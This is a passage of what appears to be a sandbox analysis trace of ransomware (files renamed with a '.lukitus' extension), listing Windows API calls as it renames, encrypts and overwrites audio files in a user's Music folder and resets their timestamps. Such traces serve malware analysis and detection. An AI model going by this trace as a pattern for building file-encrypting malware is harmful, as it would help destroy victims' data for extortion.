pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.421] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\28a7m.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\28a7m.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.421] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\28a7m.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\28a7m.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-7C24AE20-0A25AA91C989.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-7c24ae20-0a25aa91c989.lukitus"), dwFlags=0x9) returned 1 [0108.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.423] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.427] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x137ec, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x137ec, lpOverlapped=0x0) returned 1 [0108.428] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.428] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x137ec, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x137ec, lpOverlapped=0x0) returned 1 [0108.428] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.429] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64a64590, dwHighDateTime=0x1d31760)) [0108.429] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.429] FlushFileBuffers (hFile=0x328) returned 1 [0108.433] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\5a CD.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\5a cd.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8eeac90, ftCreationTime.dwHighDateTime=0x1d3014f, ftLastAccessTime.dwLowDateTime=0x1248d960, ftLastAccessTime.dwHighDateTime=0x1d2fa1f, ftLastWriteTime.dwLowDateTime=0x1248d960, ftLastWriteTime.dwHighDateTime=0x1d2fa1f, nFileSizeHigh=0x0, nFileSizeLow=0x77bf)) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.433] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\5a CD.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\5a cd.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.434] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\5a CD.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\5a cd.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-FA254207-48D9BC68F536.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-fa254207-48d9bc68f536.lukitus"), dwFlags=0x9) returned 1 [0108.435] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.435] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.440] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x77bf, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x77bf, lpOverlapped=0x0) returned 1 [0108.441] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.441] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x77bf, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x77bf, lpOverlapped=0x0) returned 1 [0108.441] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.441] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64a8a6f0, dwHighDateTime=0x1d31760)) [0108.441] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.441] FlushFileBuffers (hFile=0x328) returned 1 [0108.444] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\68_-mk gLP.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\68_-mk glp.m4a"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0b8c80, ftCreationTime.dwHighDateTime=0x1d2f618, ftLastAccessTime.dwLowDateTime=0xe6dac9d0, ftLastAccessTime.dwHighDateTime=0x1d3024a, ftLastWriteTime.dwLowDateTime=0xe6dac9d0, ftLastWriteTime.dwHighDateTime=0x1d3024a, nFileSizeHigh=0x0, nFileSizeLow=0x747)) returned 1 [0108.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.445] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.445] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.445] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.445] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.445] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.445] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.445] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.445] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.445] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.445] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.445] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.445] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\68_-mk gLP.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\68_-mk glp.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.445] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\68_-mk gLP.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\68_-mk glp.m4a"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-3FFD1798-470C2125EAB8.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-3ffd1798-470c2125eab8.lukitus"), dwFlags=0x9) returned 1 [0108.446] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.446] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.452] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x747, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x747, lpOverlapped=0x0) returned 1 [0108.452] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.452] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x747, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x747, lpOverlapped=0x0) returned 1 [0108.453] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.453] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64ab0850, dwHighDateTime=0x1d31760)) [0108.453] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.453] FlushFileBuffers (hFile=0x328) returned 1 [0108.456] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\7w7S_UlISa3.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\7w7s_ulisa3.m4a"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d82d0, ftCreationTime.dwHighDateTime=0x1d2fca3, ftLastAccessTime.dwLowDateTime=0xc856e760, ftLastAccessTime.dwHighDateTime=0x1d305be, ftLastWriteTime.dwLowDateTime=0xc856e760, ftLastWriteTime.dwHighDateTime=0x1d305be, nFileSizeHigh=0x0, nFileSizeLow=0x36bc)) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.456] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\7w7S_UlISa3.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\7w7s_ulisa3.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.456] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\7w7S_UlISa3.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\7w7s_ulisa3.m4a"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-7FC86D39-EF25D3B23399.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-7fc86d39-ef25d3b23399.lukitus"), dwFlags=0x9) returned 1 [0108.458] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.458] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.463] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x36bc, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x36bc, lpOverlapped=0x0) returned 1 [0108.464] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.464] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x36bc, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x36bc, lpOverlapped=0x0) returned 1 [0108.464] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.464] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64ad69b0, dwHighDateTime=0x1d31760)) [0108.464] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.464] FlushFileBuffers (hFile=0x328) returned 1 [0108.468] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\BpH_tgEJy5Xpr.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\bph_tgejy5xpr.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98601440, ftCreationTime.dwHighDateTime=0x1d2fea8, ftLastAccessTime.dwLowDateTime=0x6dec8170, ftLastAccessTime.dwHighDateTime=0x1d2fea9, ftLastWriteTime.dwLowDateTime=0x6dec8170, ftLastWriteTime.dwHighDateTime=0x1d2fea9, nFileSizeHigh=0x0, nFileSizeLow=0x16e31)) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.468] CryptGenRandom 